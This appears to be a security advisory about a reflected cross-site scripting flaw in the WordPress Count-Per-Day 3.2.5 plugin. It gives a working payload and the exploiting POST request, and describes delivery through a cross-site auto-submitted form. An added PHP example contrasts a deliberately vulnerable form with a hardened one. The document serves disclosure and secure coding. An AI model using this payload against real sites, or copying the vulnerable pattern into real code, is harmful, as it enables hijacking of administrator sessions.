WordPress Count-Per-Day 3.2.5 Cross Site Scripting

2013-03-05T00:00:00
ID PACKETSTORM:120649
Type packetstorm
Reporter alejandr0.m0f0
Modified 2013-03-05T00:00:00

Description

`#------------------  
# WordPress Count-Per-Day plugin 3.2.5: Type-1 (reflected) Cross Site Scripting (XSS)  
#  
# affected versions: <= 3.2.5 (tested on 3.2.5 and 3.2.3)  
#  
# impact:  
# - attacker-supplied JavaScript executes in the victim's browser, inside the WordPress site's origin  
#  
# author: alejandr0.m0f0  
  
1/ navigate to the page:  
/wordpress/wp-admin/?page=cpd_metaboxes  
  
2/ at the bottom of the page, under "visitors per day", the current date is  
printed in an input field (e.g., 2013-03-04). replace the field's value with  
2013-03-04"><img src=x onerror=alert(1)>  
and press "Show".  
  
3/ the form is submitted and the server reflects the submitted value back  
into the page without any validation or output encoding (the server-side  
"filter" is the identity function). the double quote and ">" close the  
attribute and the tag, so the injected payload is rendered and executed.  
----------  
example of the exploiting request:  
-------------------  
POST .../wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1  
...  
  
daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show  
-------------------  
# requirements: the victim must be authenticated as a user who has access  
to this plugin's admin page (e.g., an administrator).  
# this is still a practical attack: the request above is a plain POST with  
no nonce or other anti-CSRF token, so an attacker can host a page (or a  
hidden iframe) that auto-submits such a form. if the victim is logged in to  
WordPress, the browser attaches the session cookies, the payload is reflected  
and runs in the WordPress origin with the victim's session, and the  
same-origin policy therefore offers no protection against it.  
`
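The following PHP is an added illustration and is not code from the Count-Per-Day plugin (the advisory does not reproduce the plugin's source, so the function names and page structure are assumptions; only the parameter names `daytoshow` and `showday` come from the request shown above). It places the pattern that produces the reflected XSS next to a hardened version that validates the date, escapes on output, and requires a WordPress nonce, which also removes the cross-site auto-submit delivery described in the requirements section.

```php
<?php
// Added example, not the plugin's real code. Function names, form layout and
// nonce action name are assumptions; parameter names come from the advisory.

// --- Pattern that produces the reflected XSS described in the advisory ---
function cpd_vulnerable_day_form() {
    // Whatever the client posted goes straight back into an attribute value.
    // daytoshow=2013-03-04"><img src=x onerror=alert(1)> closes the value
    // attribute and the <input> tag, and the browser executes the payload.
    $day = isset($_POST['daytoshow']) ? $_POST['daytoshow'] : date('Y-m-d');
    echo '<form method="post">';
    echo '<input type="text" name="daytoshow" value="' . $day . '">';
    echo '<input type="submit" name="showday" value="Show">';
    echo '</form>';
}

// --- Hardened form: validate input, escape output, require a nonce ---

// Accept only a real calendar date written as Y-m-d; anything else falls
// back to $fallback. createFromFormat() returns false on trailing data (which
// rejects the payload outright) but silently rolls over "2013-02-31" to
// March 3, so the parsed date is re-rendered and compared with the input.
function cpd_sanitize_day($raw, $fallback) {
    $raw = is_string($raw) ? trim($raw) : '';
    $dt = DateTime::createFromFormat('Y-m-d', $raw);
    if ($dt !== false && $dt->format('Y-m-d') === $raw) {
        return $raw;
    }
    return $fallback;
}

function cpd_hardened_day_form() {
    $today = date('Y-m-d');
    $day = $today;
    if (isset($_POST['showday'])) {
        // check_admin_referer() dies unless the POST carries a nonce issued to
        // this user by this site, so a form auto-submitted from an
        // attacker-controlled page (the delivery in the advisory) is rejected.
        check_admin_referer('cpd_show_day', 'cpd_nonce');
        $day = cpd_sanitize_day(isset($_POST['daytoshow']) ? $_POST['daytoshow'] : '', $today);
    }
    echo '<form method="post">';
    wp_nonce_field('cpd_show_day', 'cpd_nonce');
    // esc_attr() is the second line of defence: even if the validation above
    // were relaxed later, quotes and angle brackets can no longer break out
    // of the attribute.
    echo '<input type="text" name="daytoshow" value="' . esc_attr($day) . '">';
    echo '<input type="submit" name="showday" value="Show">';
    echo '</form>';
}
```

Validation and output escaping are independent controls: the strict Y-m-d check is what makes the value safe to use in date arithmetic and queries, while `esc_attr()` is what makes it safe to print into HTML regardless of where it came from. The nonce does not fix the XSS itself, but it removes the only way an external attacker could deliver the POST to a logged-in administrator.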